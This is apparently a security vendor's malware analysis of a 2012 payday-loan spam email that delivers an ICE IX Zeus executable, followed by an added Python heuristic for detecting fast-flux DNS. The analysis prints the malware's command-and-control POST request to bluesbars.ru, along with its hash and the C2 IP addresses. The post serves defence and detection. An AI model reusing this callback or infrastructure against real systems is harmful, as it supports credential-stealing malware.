Check from Christian Liberty Financial

On 2012-04-02 we observed a spam email via Cisco’s Security Intelligence Operations with the subject line “Check from Christian Liberty Financial, Mon, 2 Apr 2012 12:33:29 +0100”.

This spam message contained the following body:

Advance Notice
|
Enter this code:
SODK2YP7-EO7O-BIVU-8395-4NVDN6VX6O1S
Pay-day Application Enclosed – Please Review
Money Today
Today Only!
1023
Payble to:
*******
amount:
5000.00
—————— AXLB1KQE-IFB0-KP39-C84Y-QRFSYWDQLW61 ——————————————-
Dollars
Money for:
Bills, Shopping, Vacation, Rent, Anything
***** For Immediate Processing Refer to Attached Instructions*****
CAN-SPAM Compliant
E.M.G.
341 Raven Circle
Wyoming, DE 19934

This spam message had a .zip file attached with the filename Your_Check_Details-8857777_042012.zip. This .zip file contained a malicious executable with the following properties:

File: Your_Check_Details_042012.exe
Size: 149504
MD5: A6D4F87E65359ACBB1640611D36E4685

This malicious executable is an ICE IX Zeus variant. This ICE IX Zeus variant communicates with a command and control server at bluesbars.ru via the following POST request:

POST /lampard.php HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
Connection: Close
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.2; .NET CLR 2.0.50727)
Host: bluesbars.ru
Content-Length: 77
Cache-Control: no-cache

The command and control server was configured to return an encrypted configuration file with the filename “setusating.bin”. During testing the server did not return this file.

It is worthwhile to note that the control server at bluesbars.ru was hosted on a fast flux infrastructure. Via centralops.net we see that bluesbars.ru had an A record with a TTL of 300 seconds and currently resolved to both 217.24.246.7 and 60.19.30.135. This particular fast flux infrastructure is the same infrastructure that was used in the previous spam campaign documented in our post “Triple Barrel Spam Cannon”.
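As an added example that is not part of the original post, the following Python heuristic scores repeated A-record lookups for the fast flux pattern described above. The first two observations use the TTL and the two addresses reported via centralops.net; the later observations, the /16-prefix diversity proxy and the thresholds are assumptions made for illustration.

```python
import ipaddress
from dataclasses import dataclass

# Constructed lookup history for the domain named in the post. The first two
# entries reflect the TTL and addresses reported via centralops.net; the later
# entries are invented (TEST-NET ranges) to show churn over repeated lookups.
OBSERVATIONS = [
    # (seconds since first lookup, TTL in seconds, A records returned)
    (0,    300, {"217.24.246.7", "60.19.30.135"}),
    (600,  300, {"217.24.246.7", "60.19.30.135"}),
    (1200, 300, {"60.19.30.135", "198.51.100.23"}),   # constructed
    (1800, 300, {"203.0.113.9", "198.51.100.23"}),    # constructed
]

@dataclass
class FluxVerdict:
    low_ttl: bool
    distinct_ips: int
    distinct_prefixes: int
    churned: bool
    suspicious: bool

def fast_flux_verdict(observations, ttl_threshold=300, min_ips=3, min_prefixes=2):
    """Score a series of A-record lookups for fast flux behaviour.

    Heuristic (an assumption of this example, not a published rule): a short
    TTL on its own is normal for CDNs, so we additionally require the answer
    set to churn across lookups and to span several unrelated networks,
    approximated offline by the number of distinct /16 prefixes.
    """
    low_ttl = all(ttl <= ttl_threshold for _, ttl, _ in observations)
    seen = set()
    churned = False
    for _, _, ips in observations:
        # A lookup that returns an address never seen before counts as churn.
        if seen and not ips <= seen:
            churned = True
        seen |= ips
    prefixes = {str(ipaddress.ip_network(f"{ip}/16", strict=False)) for ip in seen}
    suspicious = (low_ttl and churned
                  and len(seen) >= min_ips and len(prefixes) >= min_prefixes)
    return FluxVerdict(low_ttl, len(seen), len(prefixes), churned, suspicious)

if __name__ == "__main__":
    print(fast_flux_verdict(OBSERVATIONS))
```

A stable low-TTL answer set (the CDN case) stays unflagged because it never churns; only the combination of short TTL, new addresses appearing over time and prefix diversity trips the verdict.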
